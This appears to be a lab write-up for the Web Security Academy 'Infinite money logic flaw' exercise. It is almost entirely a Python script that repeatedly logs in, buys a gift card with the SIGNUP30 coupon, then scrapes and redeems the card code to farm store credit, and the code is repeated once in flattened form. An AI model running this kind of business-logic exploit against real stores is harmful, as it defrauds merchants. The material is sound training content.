Infinite money logic flaw

import requests
import re
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

url="https://0aca003703dff16d87002020008a00e2.web-security-academy.net/"

def login():
    r1 = requests.get(url + "login", proxies=proxies, verify=False)
    sess_cookie = r1.cookies["session"]
    csrf = re.search('" value="(.*?)">', r1.text).group(1)
    headers = {"Cookie": "session=" + sess_cookie}
    data = {"csrf": csrf, "username": "wiener", "password": "peter"}
    r2 = requests.post(url + "login",data=data,headers=headers,proxies=proxies,verify=False,allow_redirects=False)
    
    return r2.cookies["session"]

def add_gift_cart(headers):
    data = {"productId": "2", "redir": "PRODUCT", "quantity": "1"}
    r3 = requests.post(url + "cart",data=data,headers=headers,proxies=proxies,verify=False,allow_redirects=False)
    r4 = requests.get(url + "cart", headers=headers, verify=False, proxies=proxies)
    csrf = re.search('" value="(.*?)">', r4.text).group(1)
    
    return csrf

def coupon(csrf, headers):
    data = {"csrf": csrf, "coupon": "SIGNUP30"}
    r5 = requests.post(url + "cart/coupon", headers=headers, data=data, proxies=proxies, verify=False, allow_redirects=False)


def checkout(headers,csrf):
    data = {"csrf": csrf}
    r6 = requests.post(url + "cart/checkout",headers=headers,data=data,proxies=proxies,verify=False,allow_redirects=False)
    r7 = requests.get(url + "cart/order-confirmation?order-confirmed=true",headers=headers,proxies=proxies,verify=False)
    code = re.search("<th>Code</th>\n                            </tr>\n                            <tr>\n                                <td>(.*?)</td>",r7.text).group(1)

    return code

def redeem_gift_cart(csrf,headers,code):
    data = {"csrf": csrf, "gift-card": code}
    r8 = requests.post(url + "gift-card",headers=headers,data=data,proxies=proxies,verify=False,allow_redirects=False)


def main():
    for i in range(0, 500):
        sess_cookie = login()
        headers = {"Cookie": "session=" + sess_cookie}
        csrf = add_gift_cart(headers)
        coupon(csrf, headers)
        code = checkout(headers, csrf)
        redeem_gift_cart(csrf, headers, code)

if __name__ == "__main__":
    main()

PreviousLow-level logic flaw NextInformation Disclosure

Last updated 1 year ago

import requests import re import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} url="https://0aca003703dff16d87002020008a00e2.web-security-academy.net/" def login(): r1 = requests.get(url + "login", proxies=proxies, verify=False) sess_cookie = r1.cookies["session"] csrf = re.search('" value="(.*?)">', r1.text).group(1) headers = {"Cookie": "session=" + sess_cookie} data = {"csrf": csrf, "username": "wiener", "password": "peter"} r2 = requests.post(url + "login",data=data,headers=headers,proxies=proxies,verify=False,allow_redirects=False) return r2.cookies["session"] def add_gift_cart(headers): data = {"productId": "2", "redir": "PRODUCT", "quantity": "1"} r3 = requests.post(url + "cart",data=data,headers=headers,proxies=proxies,verify=False,allow_redirects=False) r4 = requests.get(url + "cart", headers=headers, verify=False, proxies=proxies) csrf = re.search('" value="(.*?)">', r4.text).group(1) return csrf def coupon(csrf, headers): data = {"csrf": csrf, "coupon": "SIGNUP30"} r5 = requests.post(url + "cart/coupon", headers=headers, data=data, proxies=proxies, verify=False, allow_redirects=False) def checkout(headers,csrf): data = {"csrf": csrf} r6 = requests.post(url + "cart/checkout",headers=headers,data=data,proxies=proxies,verify=False,allow_redirects=False) r7 = requests.get(url + "cart/order-confirmation?order-confirmed=true",headers=headers,proxies=proxies,verify=False) code = re.search("<th>Code</th>\n </tr>\n <tr>\n <td>(.*?)</td>",r7.text).group(1) return code def redeem_gift_cart(csrf,headers,code): data = {"csrf": csrf, "gift-card": code} r8 = requests.post(url + "gift-card",headers=headers,data=data,proxies=proxies,verify=False,allow_redirects=False) def main(): for i in range(0, 500): sess_cookie = login() headers = {"Cookie": "session=" + sess_cookie} csrf = add_gift_cart(headers) coupon(csrf, headers) code = checkout(headers, csrf) redeem_gift_cart(csrf, headers, code) if __name__ == "__main__": main()